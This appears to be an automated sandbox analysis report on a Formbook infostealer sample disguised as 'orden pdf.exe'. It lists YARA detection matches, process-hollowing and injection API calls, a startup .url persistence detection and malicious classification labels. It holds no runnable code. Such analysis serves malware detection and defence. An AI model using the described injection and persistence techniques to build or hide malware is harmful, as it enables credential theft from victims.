          Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          AutoIt script contains suspicious strings
          Source: orden pdf.exeAutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
          Source: DeviceCensus.exe.exe.0.drAutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
          Source: cx9l_rq2dula.exe.3.drAutoIt Script: 66663092 $HANDLE = DLLCALLADDRESS (MTDUDAQCWRWM ("667
          Binary is likely a compiled AutoIt script file
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: This is a third-party compiled AutoIt script.
          Source: orden pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: orden pdf.exe, 00000000.00000002.252510158.000000000021E000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: orden pdf.exe, 00000001.00000002.233175042.000000000021E000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_3_014600AD NtOpenSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_3_01461C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00419850 NtCreateFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00419900 NtReadFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00419980 NtClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00419A30 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_004198FA NtReadFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_0041997A NtClose,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_00419A2A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017AB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017AA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9560 NtWriteFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017AAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017AA770 NtOpenThread,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017AA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 2_2_017A96D0 NtCreateKey,
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeCode function: 5_3_00CE00AD NtOpenSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B6606: CreateFileW,DeviceIoControl,CloseHandle,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001B79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
          Source: orden pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DeviceCensus.exe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: cx9l_rq2dula.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: orden pdf.exe, 00000000.00000003.249639014.0000000001521000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs orden pdf.exe
          Source: orden pdf.exe, 00000000.00000003.249639014.0000000001521000.00000004.00000001.sdmpBinary or memory string: FV_ORIGINALFILENAMEF vs orden pdf.exe
          Source: orden pdf.exe, 00000000.00000003.250755956.00000000014AA000.00000004.00000001.sdmpBinary or memory string: FV_ORIGINALFILENAMEN vs orden pdf.exe
          Source: orden pdf.exe, 00000000.00000003.250755956.00000000014AA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameo\ vs orden pdf.exe
          Source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs orden pdf.exe
          Source: orden pdf.exe, 00000002.00000002.300214907.0000000001733000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs orden pdf.exe
          Source: orden pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@217/11@9/3
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BCE7A GetLastError,FormatMessageW,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AAB84 AdjustTokenPrivileges,CloseHandle,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001AB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001AAB84 AdjustTokenPrivileges,CloseHandle,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001AB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,
